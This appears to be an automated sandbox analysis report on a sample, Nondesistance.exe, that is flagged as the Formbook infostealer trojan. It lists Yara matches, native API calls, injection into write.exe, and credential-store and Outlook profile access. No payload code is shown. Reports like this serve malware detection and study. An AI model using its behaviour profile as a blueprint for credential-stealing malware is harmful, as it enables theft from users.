        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 4_2_00405086 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard

        E-Banking Fraud

        Source: Yara match File source: 0000000B.00000002.25033531702.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000009.00000002.20405040501.00000000321A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 0000000B.00000002.25033303278.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 0000000B.00000002.25029850755.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 0000000A.00000002.25034036659.00000000042F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000009.00000002.20405923409.0000000034610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 0000000B.00000002.25033531702.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000009.00000002.20405040501.00000000321A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000B.00000002.25033303278.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000B.00000002.25029850755.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000A.00000002.25034036659.00000000042F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000009.00000002.20405923409.0000000034610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_325334E0 NtCreateMutant,LdrInitializeThunk
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532B90 NtFreeVirtualMemory,LdrInitializeThunk
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532D10 NtQuerySystemInformation,LdrInitializeThunk
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32534260 NtSetContextThread
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32534570 NtSuspendThread
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532A10 NtWriteFile
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532AC0 NtEnumerateValueKey
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532A80 NtClose
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532AA0 NtQueryInformationFile
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532B10 NtAllocateVirtualMemory
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532B00 NtQueryValueKey
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532B20 NtQueryInformationProcess
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532BC0 NtQueryInformationToken
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532BE0 NtQueryVirtualMemory
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532B80 NtCreateKey
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_325338D0 NtGetContextThread
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_325329D0 NtWaitForSingleObject
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_325329F0 NtReadFile
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532E50 NtCreateSection
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532E00 NtQueueApcThread
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532ED0 NtResumeThread
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532EC0 NtQuerySection
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532E80 NtCreateProcessEx
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532EB0 NtProtectVirtualMemory
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532F00 NtCreateFile
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532F30 NtOpenDirectoryObject
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532FB0 NtSetValueKey
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532C50 NtUnmapViewOfSection
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532C10 NtOpenProcess
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32533C30 NtOpenProcessToken
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532C30 NtMapViewOfSection
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532C20 NtSetInformationFile
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532CD0 NtEnumerateKey
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_32532CF0 NtDelayExecution
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 4_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
        Source: C:\Users\user\Desktop\Nondesistance.exe File created: C:\Windows\resources\0409
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: String function: 32535050 appears 32 times
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: String function: 3257EF10 appears 86 times
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: String function: 324EB910 appears 241 times
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: String function: 32547BE4 appears 82 times
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: String function: 3256E692 appears 78 times
        Source: Nondesistance.exe Static PE information: invalid certificate
        Source: Nondesistance.exe, 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameflinkeste anorectous.exeN vs Nondesistance.exe
        Source: Nondesistance.exe, 00000009.00000002.20393067767.00000000021CB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewritej% vs Nondesistance.exe
        Source: Nondesistance.exe, 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Nondesistance.exe
        Source: Nondesistance.exe, 00000009.00000003.20303958082.0000000032443000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Nondesistance.exe
        Source: Nondesistance.exe, 00000009.00000002.20405124824.0000000032790000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Nondesistance.exe
        Source: Nondesistance.exe, 00000009.00000000.20118343290.0000000000448000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameflinkeste anorectous.exeN vs Nondesistance.exe
        Source: Nondesistance.exe, 00000009.00000002.20393067767.00000000021D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewritej% vs Nondesistance.exe
        Source: Nondesistance.exe, 00000009.00000003.20300365198.000000003228E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Nondesistance.exe
        Source: Nondesistance.exe Binary or memory string: OriginalFilenameflinkeste anorectous.exeN vs Nondesistance.exe
        Source: Nondesistance.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 0000000B.00000002.25033531702.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000009.00000002.20405040501.00000000321A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000B.00000002.25033303278.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000B.00000002.25029850755.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000A.00000002.25034036659.00000000042F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000009.00000002.20405923409.0000000034610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/8@31/16
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 4_2_00404352 GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,4_2_00404352
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 4_2_0040205E LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,4_2_0040205E
        Source: C:\Users\user\Desktop\Nondesistance.exe File created: C:\Users\user\dewater
        Source: C:\Users\user\Desktop\Nondesistance.exe File created: C:\Users\user\AppData\Local\Temp\nsq11AE.tmp
        Source: Nondesistance.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Nondesistance.exe File read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\Nondesistance.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: write.exe, 0000000B.00000003.20563852231.0000000002E4A000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000003.20563852231.0000000002E29000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25030469735.0000000002E4A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: Nondesistance.exe ReversingLabs: Detection: 50%
        Source: Nondesistance.exe Virustotal: Detection: 56%
        Source: C:\Users\user\Desktop\Nondesistance.exe File read: C:\Users\user\Desktop\Nondesistance.exe
        Source: unknown Process created: C:\Users\user\Desktop\Nondesistance.exe "C:\Users\user\Desktop\Nondesistance.exe"
        Source: C:\Users\user\Desktop\Nondesistance.exe Process created: C:\Users\user\Desktop\Nondesistance.exe "C:\Users\user\Desktop\Nondesistance.exe"
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
        Source: C:\Windows\SysWOW64\write.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: userenv.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: propsys.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: dwmapi.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: oleacc.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: version.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: shfolder.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: riched20.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: usp10.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: msls31.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: textinputframework.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: coreuicomponents.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: coremessaging.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: ntmarta.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: textshaping.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: sspicli.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: powrprof.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: winhttp.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: wkscli.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: netutils.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: umpdc.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: wininet.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: mswsock.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: iphlpapi.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: winnsi.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: urlmon.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: srvcli.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: dnsapi.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: rasadhlp.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: fwpuclnt.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: schannel.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: mskeyprotect.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: ntasn1.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: msasn1.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: dpapi.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: cryptsp.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: rsaenh.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: gpapi.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: ncrypt.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: ncryptsslp.dll
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe Section loaded: wininet.dll
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe Section loaded: mswsock.dll
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe Section loaded: dnsapi.dll
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe Section loaded: iphlpapi.dll
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe Section loaded: fwpuclnt.dll
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe Section loaded: rasadhlp.dll
        Source: C:\Windows\SysWOW64\write.exe Section loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\write.exe Section loaded: wininet.dll
        Source: C:\Windows\SysWOW64\write.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\write.exe Section loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\write.exe Section loaded: ieframe.dll
        Source: C:\Windows\SysWOW64\write.exe Section loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\write.exe Section loaded: netapi32.dll
        Source: C:\Windows\SysWOW64\write.exe Section loaded: version.dll
        Source: C:\Windows\SysWOW64\write.exe Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\write.exe Section loaded: winhttp.dll
        Source: C:\Windows\SysWOW64\write.exe Section loaded: wkscli.dll
        Source: C:\Windows\SysWOW64\write.exe Section loaded: netutils.dll
        Source: C:\Windows\SysWOW64\write.exe Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\write.exe Section loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\write.exe Section loaded: wldp.dll
        Source: C:\Windows\SysWOW64\write.exe Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\write.exe Section loaded: secur32.dll
        Source: C:\Windows\SysWOW64\write.exe Section loaded: mlang.dll
        Source: C:\Windows\SysWOW64\write.exe Section loaded: propsys.dll
        Source: C:\Windows\SysWOW64\write.exe Section loaded: winsqlite3.dll
        Source: C:\Windows\SysWOW64\write.exe Section loaded: vaultcli.dll
        Source: C:\Windows\SysWOW64\write.exe Section loaded: wintypes.dll
        Source: C:\Windows\SysWOW64\write.exe Section loaded: dpapi.dll
        Source: C:\Windows\SysWOW64\write.exe Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\Nondesistance.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
        Source: betnksomme.lnk.4.dr LNK file: ..\AppData\Roaming\immoralizing.tar
        Source: C:\Users\user\Desktop\Nondesistance.exe File written: C:\Users\user\AppData\Local\Temp\Settings.ini
        Source: C:\Windows\SysWOW64\write.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
        Source: Nondesistance.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: write.pdbGCTL source: Nondesistance.exe, 00000009.00000002.20393067767.00000000021CB000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20393067767.00000000021D5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: write.pdb source: Nondesistance.exe, 00000009.00000002.20393067767.00000000021CB000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20393067767.00000000021D5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: Nondesistance.exe, 00000009.00000001.20120981057.0000000000649000.00000020.00000001.01000000.00000009.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25033001346.0000000000C3E000.00000002.00000001.01000000.0000000B.sdmp
        Source: Binary string: wntdll.pdbUGP source: Nondesistance.exe, 00000009.00000003.20300365198.000000003216B000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20303958082.0000000032316000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25033905164.0000000004B7D000.00000040.00001000.00020000.00000000.sdmp, write.exe, 0000000B.00000003.20394487085.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000003.20391249832.00000000046FE000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25033905164.0000000004A50000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Nondesistance.exe, Nondesistance.exe, 00000009.00000003.20300365198.000000003216B000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20303958082.0000000032316000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25033905164.0000000004B7D000.00000040.00001000.00020000.00000000.sdmp, write.exe, 0000000B.00000003.20394487085.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000003.20391249832.00000000046FE000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25033905164.0000000004A50000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Nondesistance.exe, 00000009.00000001.20120981057.0000000000649000.00000020.00000001.01000000.00000009.sdmp

        Data Obfuscation

        Source: Yara match File source: 00000004.00000002.20222463111.00000000050BE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 4_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 4_2_10001A5D
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 4_2_10002D20 push eax; ret 4_2_10002D4E
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_324CE060 push eax; retf 0008h 9_2_324CE06D
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_324CE074 pushfd ; retf 9_2_324CE075
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_324C21AD pushad ; retf 0004h 9_2_324C223F
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_324C97A1 push es; iretd 9_2_324C97A8
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 9_2_324F08CD push ecx; mov dword ptr [esp], ecx 9_2_324F08D6
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe Code function: 10_2_006168F3 push ds; iretd 10_2_006168F5
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe Code function: 10_2_00614159 push es; ret 10_2_006141DB
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe Code function: 10_2_00620930 push ebx; ret 10_2_0062096A
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe Code function: 10_2_006141B0 push es; ret 10_2_006141DB
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe Code function: 10_2_00611A4C push ebx; ret 10_2_00611A55
